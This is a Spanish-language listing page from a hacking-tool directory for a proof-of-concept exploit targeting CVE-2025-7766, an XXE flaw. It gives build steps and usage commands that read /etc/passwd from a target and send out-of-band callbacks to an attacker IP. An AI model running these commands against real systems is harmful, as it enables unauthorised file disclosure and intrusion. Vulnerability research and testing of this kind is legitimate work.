Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-7766 — Exploit PoC para CVE-2025-7766 – vulnerabilidad XXE que puede conducir a un posible RCE. | Kitploit
Herramientas/GitHubGitHub/bytereaper77/cve-2025-7766
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de PayloadsArchived
GitHubbytereaper77/cve-2025-7766

CVE-2025-7766

Exploit PoC para CVE-2025-7766 – vulnerabilidad XXE que puede conducir a un posible RCE.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-7766 Exploit PoC

PoC para explotar la vulnerabilidad de entidad externa XML en CVE-2025-7766. Demuestra lectura de archivos (/etc/passwd) y callbacks HTTP fuera de banda.

Autor: Byte Reaper

CVE: CVE-2025-7766

Vulnerabilidad: Ejecución remota de código a través de entidad externa XML (XXE)


PoC para explotar XXE en CVE-2025-7766. Demuestra:

  • Lectura de /etc/passwd desde el objetivo.
  • Activación de solicitud HTTP fuera de banda a su servidor.

Requisitos

  • gcc
  • libcurl
  • librería argparse

Compilación

root@kitploit:~
gcc -o exploit exploit.c argparse.c -lcurl

Uso

root@kitploit:~
# Read file payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT

# Out-of-band request payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r

# Custom payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'

# Repeat requests 5 times
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5

# Verbose output
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v

LICENCIA:

MIT

Descargar herramienta